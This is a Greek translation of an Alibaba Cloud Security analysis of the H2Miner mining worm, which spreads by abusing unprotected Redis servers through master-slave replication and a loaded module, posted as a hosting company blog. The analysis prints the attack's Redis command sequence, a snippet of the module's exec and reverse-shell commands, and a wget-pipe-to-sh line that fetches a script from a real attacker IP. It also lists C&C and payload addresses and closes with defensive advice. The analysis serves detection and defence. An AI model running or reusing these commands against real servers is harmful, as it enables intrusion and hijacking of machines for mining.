ProHoster > Blog > διαχείριση > Ανακαλύφθηκε ένα νέο ξέσπασμα σκουληκιών H2Miner που εκμεταλλεύεται το Redis RCE

Ανακαλύφθηκε ένα νέο ξέσπασμα σκουληκιών H2Miner που εκμεταλλεύεται το Redis RCE

Πριν από μια μέρα, ένας από τους διακομιστές του έργου μου δέχτηκε επίθεση από ένα παρόμοιο σκουλήκι. Αναζητώντας μια απάντηση στην ερώτηση "τι ήταν αυτό;" Βρήκα ένα υπέροχο άρθρο από την ομάδα Alibaba Cloud Security. Επειδή δεν βρήκα αυτό το άρθρο στο Habré, αποφάσισα να το μεταφράσω ειδικά για εσάς <3

Είσοδος

Πρόσφατα, η ομάδα ασφαλείας του Alibaba Cloud ανακάλυψε ένα ξαφνικό ξέσπασμα του H2Miner. Αυτός ο τύπος κακόβουλου ιού τύπου worm χρησιμοποιεί την έλλειψη εξουσιοδότησης ή τους αδύναμους κωδικούς πρόσβασης για το Redis ως πύλες στα συστήματά σας, μετά από τις οποίες συγχρονίζει τη δική του κακόβουλη μονάδα με το slave μέσω του συγχρονισμού master-slave και τελικά κατεβάζει αυτήν την κακόβουλη μονάδα στο μηχάνημα που επιτίθεται και εκτελεί κακόβουλο οδηγίες.

Στο παρελθόν, οι επιθέσεις στα συστήματά σας πραγματοποιούνταν κυρίως χρησιμοποιώντας μια μέθοδο που περιελάμβανε προγραμματισμένες εργασίες ή κλειδιά SSH που γράφτηκαν στον υπολογιστή σας μετά τη σύνδεση του εισβολέα στο Redis. Ευτυχώς, αυτή η μέθοδος δεν μπορεί να χρησιμοποιηθεί συχνά λόγω προβλημάτων με τον έλεγχο αδειών ή λόγω διαφορετικών εκδόσεων συστήματος. Ωστόσο, αυτή η μέθοδος φόρτωσης μιας κακόβουλης μονάδας μπορεί να εκτελέσει απευθείας τις εντολές του εισβολέα ή να αποκτήσει πρόσβαση στο κέλυφος, κάτι που είναι επικίνδυνο για το σύστημά σας.

Λόγω του μεγάλου αριθμού διακομιστών Redis που φιλοξενούνται στο Διαδίκτυο (σχεδόν 1 εκατομμύριο), η ομάδα ασφαλείας του Alibaba Cloud, ως φιλική υπενθύμιση, συνιστά στους χρήστες να μην μοιράζονται το Redis στο διαδίκτυο και να ελέγχουν τακτικά την ισχύ των κωδικών πρόσβασής τους και εάν έχουν παραβιαστεί. γρήγορη επιλογή.

H2Miner

Το H2Miner είναι ένα botnet εξόρυξης για συστήματα που βασίζονται σε Linux που μπορεί να εισβάλει στο σύστημά σας με διάφορους τρόπους, συμπεριλαμβανομένης της έλλειψης εξουσιοδότησης σε ευπάθειες Hadoop yarn, Docker και Redis Remote Command execution (RCE). Ένα botnet λειτουργεί με τη λήψη κακόβουλων σεναρίων και κακόβουλου λογισμικού για την εξόρυξη των δεδομένων σας, την επέκταση της επίθεσης οριζόντια και τη διατήρηση των επικοινωνιών εντολών και ελέγχου (C&C).

Redis RCE

Γνώση σχετικά με αυτό το θέμα κοινοποιήθηκε από τον Pavel Toporkov στο ZeroNights 2018. Μετά την έκδοση 4.0, το Redis υποστηρίζει μια δυνατότητα φόρτωσης προσθήκης που δίνει στους χρήστες τη δυνατότητα να φορτώνουν αρχεία που έχουν μεταγλωττιστεί με C στο Redis για να εκτελούν συγκεκριμένες εντολές Redis. Αυτή η συνάρτηση, αν και χρήσιμη, περιέχει μια ευπάθεια στην οποία, σε λειτουργία master-slave, τα αρχεία μπορούν να συγχρονιστούν με το slave μέσω της λειτουργίας πλήρους συγχρονισμού. Αυτό μπορεί να χρησιμοποιηθεί από έναν εισβολέα για τη μεταφορά κακόβουλων αρχείων. Μετά την ολοκλήρωση της μεταφοράς, οι εισβολείς φορτώνουν τη λειτουργική μονάδα στην παρουσία Redis που δέχεται επίθεση και εκτελούν οποιαδήποτε εντολή.

Ανάλυση σκουληκιών κακόβουλου λογισμικού

Πρόσφατα, η ομάδα ασφαλείας του Alibaba Cloud ανακάλυψε ότι το μέγεθος της ομάδας κακόβουλων εξορυκτών H2Miner έχει ξαφνικά αυξηθεί δραματικά. Σύμφωνα με την ανάλυση, η γενική διαδικασία εμφάνισης της επίθεσης έχει ως εξής:

Ανακαλύφθηκε ένα νέο ξέσπασμα σκουληκιών H2Miner που εκμεταλλεύεται το Redis RCE

Το H2Miner χρησιμοποιεί το RCE Redis για μια πλήρη επίθεση. Οι εισβολείς επιτίθενται πρώτα σε μη προστατευμένους διακομιστές Redis ή διακομιστές με αδύναμους κωδικούς πρόσβασης.

Στη συνέχεια χρησιμοποιούν την εντολή config set dbfilename red2.so για να αλλάξετε το όνομα του αρχείου. Μετά από αυτό, οι εισβολείς εκτελούν την εντολή slaveof για να ορίσετε τη διεύθυνση κεντρικού υπολογιστή αναπαραγωγής master-slave.

Όταν η παρουσία Redis που δέχεται επίθεση δημιουργεί μια σύνδεση master-slave με το κακόβουλο Redis που ανήκει στον εισβολέα, ο εισβολέας στέλνει τη μολυσμένη μονάδα χρησιμοποιώντας την εντολή fullresync για να συγχρονίσει τα αρχεία. Στη συνέχεια, το αρχείο red2.so θα μεταφορτωθεί στο μηχάνημα που δέχεται επίθεση. Στη συνέχεια, οι εισβολείς χρησιμοποιούν τη μονάδα φόρτωσης ./red2.so για να φορτώσουν αυτό το αρχείο so. Η μονάδα μπορεί να εκτελέσει εντολές από έναν εισβολέα ή να ξεκινήσει μια αντίστροφη σύνδεση (backdoor) για να αποκτήσει πρόσβαση στο μηχάνημα που δέχεται επίθεση.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Μετά την εκτέλεση μιας κακόβουλης εντολής όπως π.χ / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ο εισβολέας θα επαναφέρει το όνομα του αρχείου αντιγράφου ασφαλείας και θα ξεφορτώσει τη λειτουργική μονάδα συστήματος για να καθαρίσει τα ίχνη. Ωστόσο, το αρχείο red2.so θα παραμείνει στο μηχάνημα που έχει επιτεθεί. Συνιστάται στους χρήστες να δώσουν προσοχή στην παρουσία ενός τέτοιου ύποπτου αρχείου στο φάκελο της παρουσίας τους Redis.

Εκτός από τη θανάτωση ορισμένων κακόβουλων διεργασιών για την κλοπή πόρων, ο εισβολέας ακολούθησε ένα κακόβουλο σενάριο κατεβάζοντας και εκτελώντας κακόβουλα δυαδικά αρχεία στο 142.44.191.122 / συγγένεια. Αυτό σημαίνει ότι το όνομα της διεργασίας ή το όνομα καταλόγου που περιέχει kinsing στον κεντρικό υπολογιστή μπορεί να υποδεικνύει ότι το μηχάνημα έχει μολυνθεί από αυτόν τον ιό.

Σύμφωνα με τα αποτελέσματα της αντίστροφης μηχανικής, το κακόβουλο λογισμικό εκτελεί κυρίως τις ακόλουθες λειτουργίες:

  • Μεταφόρτωση αρχείων και εκτέλεσή τους
  • Εξόρυξη
  • Διατήρηση επικοινωνίας C&C και εκτέλεση εντολών εισβολέα

Ανακαλύφθηκε ένα νέο ξέσπασμα σκουληκιών H2Miner που εκμεταλλεύεται το Redis RCE

Χρησιμοποιήστε το Mascan για εξωτερική σάρωση για να επεκτείνετε την επιρροή σας. Επιπλέον, η διεύθυνση IP του διακομιστή C&C είναι κωδικοποιημένη στο πρόγραμμα και ο κεντρικός υπολογιστής που δέχεται επίθεση θα επικοινωνεί με τον διακομιστή επικοινωνίας C&C χρησιμοποιώντας αιτήματα HTTP, όπου οι πληροφορίες ζόμπι (διακομιδής σε κίνδυνο) προσδιορίζονται στην κεφαλίδα HTTP.

Ανακαλύφθηκε ένα νέο ξέσπασμα σκουληκιών H2Miner που εκμεταλλεύεται το Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Άλλες μέθοδοι επίθεσης

Ανακαλύφθηκε ένα νέο ξέσπασμα σκουληκιών H2Miner που εκμεταλλεύεται το Redis RCE

Διευθύνσεις και σύνδεσμοι που χρησιμοποιούνται από το σκουλήκι

/συγγενική

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Συμβούλιο

Πρώτον, το Redis δεν πρέπει να είναι προσβάσιμο από το Διαδίκτυο και θα πρέπει να προστατεύεται με ισχυρό κωδικό πρόσβασης. Είναι επίσης σημαντικό οι πελάτες να ελέγχουν ότι δεν υπάρχει αρχείο red2.so στον κατάλογο Redis και ότι δεν υπάρχει "kinsing" στο όνομα αρχείου/διεργασίας στον κεντρικό υπολογιστή.

Πηγή: www.habr.com

Προσθέστε ένα σχόλιο